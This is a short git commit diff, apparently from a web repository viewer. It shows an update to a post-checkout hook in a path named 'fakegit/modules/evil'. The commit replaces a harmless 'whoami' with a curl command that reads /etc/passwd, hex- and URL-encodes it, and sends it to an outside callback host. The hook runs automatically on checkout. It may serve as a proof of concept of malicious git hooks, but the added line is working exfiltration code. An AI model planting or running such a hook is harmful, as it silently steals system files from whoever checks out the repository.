Update fakegit/modules/evil/hooks/post-checkout
This commit is contained in:
parent
339854a7fa
commit
a21356a7c6
|
|
@ -1,2 +1,2 @@
|
||||||
#!/bin/sh
|
#!/bin/sh
|
||||||
whoami
|
curl "https://z0.rs/callback?msg=$(cat /etc/passwd | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g')"
|
||||||
Loading…
Reference in New Issue